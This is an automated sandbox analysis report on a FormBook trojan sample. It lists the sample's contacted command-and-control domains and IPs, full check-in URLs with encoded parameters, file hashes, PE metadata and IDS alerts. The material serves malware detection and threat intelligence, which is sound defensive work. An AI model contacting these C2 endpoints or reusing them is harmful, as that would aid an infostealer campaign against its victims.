              truetrueunknown
              www.isshinn1.com
              157.7.107.193
              truetrue
                unknown
                www.sosoon.store
                18.118.119.183
                truetrue
                  unknown
                  www.24000words.com
                  156.240.150.22
                  truetrue
                    unknown
                    thedusi.com
                    34.102.136.180
                    truefalse
                      unknown
                      www.healthyweekendtips.com
                      172.67.216.2
                      truetrue
                        unknown
                        mask60.com
                        116.212.126.191
                        truetrue
                          unknown
                          websites076.homestead.com
                          108.167.135.122
                          truefalse
                            high
                            www.esyscoloradosprings.com
                            unknown
                            unknowntrue
                              unknown
                              www.mask60.com
                              unknown
                              unknowntrue
                                unknown
                                www.qywyfeo8.xyz
                                unknown
                                unknowntrue
                                  unknown
                                  www.megacinema.club
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.creationslazzaroni.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.thedusi.com
                                      unknown
                                      unknowntrue
                                        unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.isshinn1.com/fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfatrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.thedusi.com/fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        www.esyscoloradosprings.com/fqiq/true
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.passiverewardssystems.com/fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.megacinema.club/fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIgtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.24000words.com/fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rdoi.top/fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sosoon.store/fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.esyscoloradosprings.com/fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csscscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpfalse
                                          high
                                          http://www.collada.org/2005/11/COLLADASchema9DoneCtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://pepabo.com/cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpfalse
                                            high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            157.7.107.193
                                            www.isshinn1.comJapan7506INTERQGMOInternetIncJPtrue
                                            172.67.216.2
                                            www.healthyweekendtips.comUnited States
                                            13335CLOUDFLARENETUStrue
                                            108.167.135.122
                                            websites076.homestead.comUnited States
                                            46606UNIFIEDLAYER-AS-1USfalse
                                            203.170.80.253
                                            www.passiverewardssystems.comAustralia
                                            38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                            156.240.150.22
                                            www.24000words.comSeychelles
                                            328608Africa-on-Cloud-ASZAtrue
                                            18.118.119.183
                                            www.sosoon.storeUnited States
                                            3MIT-GATEWAYSUStrue
                                            34.102.136.180
                                            thedusi.comUnited States
                                            15169GOOGLEUSfalse
                                            104.233.161.241
                                            www.rdoi.topUnited States
                                            54600PEGTECHINCUStrue
                                            45.93.101.51
                                            megacinema.clubGermany
                                            40065CNSERVERSUStrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:510401
                                            Start date:27.10.2021
                                            Start time:19:12:07
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:CtTYTpaAKA.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:23
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@12/9
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 10.8% (good quality ratio 9.6%)
                                            • Quality average: 72.4%
                                            • Quality standard deviation: 32.2%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 20.50.102.62, 20.54.110.249, 40.91.112.76, 40.112.88.60, 80.67.82.235, 80.67.82.242
                                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            19:13:02API Interceptor2x Sleep call for process: CtTYTpaAKA.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            157.7.107.193sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • www.isshinn1.com/fqiq/?Pbu=IbAhXpax&i48l=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8YomPo1w412d
                                            172.67.216.22u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • www.healthyweekendtips.com/fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX
                                            108.167.135.122vx55dc0wIv.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?mJEhrX=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk&s2JD=cFNDC4_po
                                            CONTRACT 18639.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?9ru=0nUtrL7PKd04iT&dVuxZRHH=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==
                                            CONTRACT 18641.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?1bft=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&m6Gd=YR-dILR0AVm
                                            DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?c0=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&c2MXRn=tzuHZ0-p5d904
                                            PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?m0=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&Z0G8=jhqLW0YxgjI
                                            XCFqu9rd3Q.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?9r=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&lxoxn=-Z44Jj
                                            mkjnI5hbhI.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?aJBX0=PzuD_l&IN643ZF0=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk
                                            T7huuSvQv4.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?T48d=f2MHm2U&Y6Upd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk
                                            ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?AV38jb=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&exoP_6=9raXztspjfNlRrw0
                                            CXVlBV2Bya.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?f0GxZ=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&9rM=SL04qF
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?i48l=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&Pbu=IbAhXpax
                                            2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw==
                                            divpCHa0h7.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.rdoi.topCONTRACT 18639.xlsxGet hashmaliciousBrowse
                                            • 104.233.161.241
                                            PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                                            • 104.233.161.241
                                            www.passiverewardssystems.comDMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            mkjnI5hbhI.exeGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            CXVlBV2Bya.exeGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            triage_dropped_file.exeGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            www.isshinn1.comsLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            www.healthyweekendtips.comT7huuSvQv4.exeGet hashmaliciousBrowse
                                            • 104.21.78.41
                                            2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • 172.67.216.2
                                            www.sosoon.storetzdVV2W5et.exeGet hashmaliciousBrowse
                                            • 18.118.119.183
                                            4OlVYrynpO.exeGet hashmaliciousBrowse
                                            • 18.118.119.183
                                            XCFqu9rd3Q.exeGet hashmaliciousBrowse
                                            • 18.118.119.183
                                            T7huuSvQv4.exeGet hashmaliciousBrowse
                                            • 51.81.185.94
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 51.81.185.94
                                            www.24000words.com2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • 156.240.150.22
                                            bGOw6FuOUA.exeGet hashmaliciousBrowse
                                            • 156.240.150.22
                                            websites076.homestead.comvx55dc0wIv.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            CONTRACT 18639.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            CONTRACT 18641.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            XCFqu9rd3Q.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            mkjnI5hbhI.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            T7huuSvQv4.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            CXVlBV2Bya.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            triage_dropped_file.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            PO 4910007391 CHANGZHOU.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            t8MQow7sN9.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            ClgNlmU3Is.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            divpCHa0h7.exeGet hashmaliciousBrowse
                                            • 108.167.135.122

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            INTERQGMOInternetIncJPSHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            F9ObnUc4ol.exeGet hashmaliciousBrowse
                                            • 118.27.122.187
                                            DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                            • 150.95.219.218
                                            n7gjtO4ZwD.exeGet hashmaliciousBrowse
                                            • 118.27.122.92
                                            F30AGnBthja6Ka2.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            PFD33mzc5lGet hashmaliciousBrowse
                                            • 118.27.80.204
                                            comingback.exeGet hashmaliciousBrowse
                                            • 118.27.122.217
                                            MV ANACAPA LIGHT.xlsxGet hashmaliciousBrowse
                                            • 118.27.122.214
                                            cyberantix-PayroLL-997263-pdf.HtMLGet hashmaliciousBrowse
                                            • 150.95.219.148
                                            cyberantix-PayroLL-997263-pdf.HtMLGet hashmaliciousBrowse
                                            • 150.95.219.148
                                            8jfOcvTqQAGet hashmaliciousBrowse
                                            • 163.44.189.209
                                            IN7REq0Jv5Get hashmaliciousBrowse
                                            • 133.130.112.119
                                            GDs-#09283 DIAGRAM AND PRODUCT SPECIFICATIONS.pdl.exeGet hashmaliciousBrowse
                                            • 150.95.59.10
                                            s0bi9tGet hashmaliciousBrowse
                                            • 210.157.44.132
                                            Diagram and Specifications.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            soa_02010021.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            94VG.armGet hashmaliciousBrowse
                                            • 157.7.100.11
                                            PO08485.xlsxGet hashmaliciousBrowse
                                            • 118.27.122.218
                                            7UMLyz3hby.exeGet hashmaliciousBrowse
                                            • 150.95.59.9
                                            CLOUDFLARENETUS6TUQ9Lb5rN.exeGet hashmaliciousBrowse
                                            • 172.67.190.175
                                            ezzvG6vQ5l.exeGet hashmaliciousBrowse
                                            • 172.67.195.238
                                            Eh36aKpvNOXJcT8.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            2098765434567890098765.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            0987234567890.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LENEEsYC55YCboo.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            oytu1F59dV.exeGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            Early_Access.-3878_20211027.xlsbGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            Betalingskvittering.exeGet hashmaliciousBrowse
                                            • 104.21.40.182
                                            Casting Invite.-859403670_20211027.xlsbGet hashmaliciousBrowse
                                            • 162.159.130.233
                                            10272021-AM65Application.HTMGet hashmaliciousBrowse
                                            • 104.18.11.207
                                            x86_64Get hashmaliciousBrowse
                                            • 104.28.249.1
                                            calculadora-trading-criptomonedas-binance-1 (1).apkGet hashmaliciousBrowse
                                            • 172.67.169.191
                                            calculadora-trading-criptomonedas-binance-1 (1).apkGet hashmaliciousBrowse
                                            • 172.67.169.191
                                            Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exeGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            GAWEVQV50254.vbsGet hashmaliciousBrowse
                                            • 104.21.41.22
                                            Hl9GJ6GvUS.exeGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            409876543456789.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            setup_installer.exeGet hashmaliciousBrowse
                                            • 104.21.51.48
                                            Copy Payment 10272021 pdf.exeGet hashmaliciousBrowse
                                            • 104.21.1.146

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CtTYTpaAKA.exe.log
                                            Process:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):6.652354508446339
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:CtTYTpaAKA.exe
                                            File size:512000
                                            MD5:4a640b5abfd52dc70eb962bf9f250714
                                            SHA1:19433ceeaae0f6b678f77e8494a39de9e9d4f870
                                            SHA256:0e636b89393a1581a2e3f4b141c9886bed9c77969569605cdb44b78d94127802
                                            SHA512:36171523a4412146929a73e7d52999a7980f43b576107ae5d4ac65093d49c99eab76acb8527d90b018d92bd15b0c42217810e5f3f3a11bddbc791405deff0c41
                                            SSDEEP:6144:loIQZS4/ZF0145hcJnwO88qariw5fBbP7tJOsDRYG:SIQZhfY8hcinQPpbPxJLDR
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rya..............0.............v.... ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x47e576
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x617972D2 [Wed Oct 27 15:40:02 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7e5240x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5ec.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x7c57c0x7c600False0.68001531093data6.66263317517IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x800000x5ec0x600False0.439453125data4.22334624652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x820000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x800900x35cdata
                                            RT_MANIFEST0x803fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightDelchamps 2015
                                            Assembly Version7.3.0.0
                                            InternalNameBinaryArrayTypeEn.exe
                                            FileVersion7.3.0.0
                                            CompanyNameDelchamps
                                            LegalTrademarks
                                            Comments
                                            ProductNamePlatformer_AI
                                            ProductVersion7.3.0.0
                                            FileDescriptionPlatformer_AI
                                            OriginalFilenameBinaryArrayTypeEn.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            10/27/21-19:14:30.605388TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3203.170.80.253
                                            10/27/21-19:14:30.605388TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3203.170.80.253
                                            10/27/21-19:14:30.605388TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3203.170.80.253
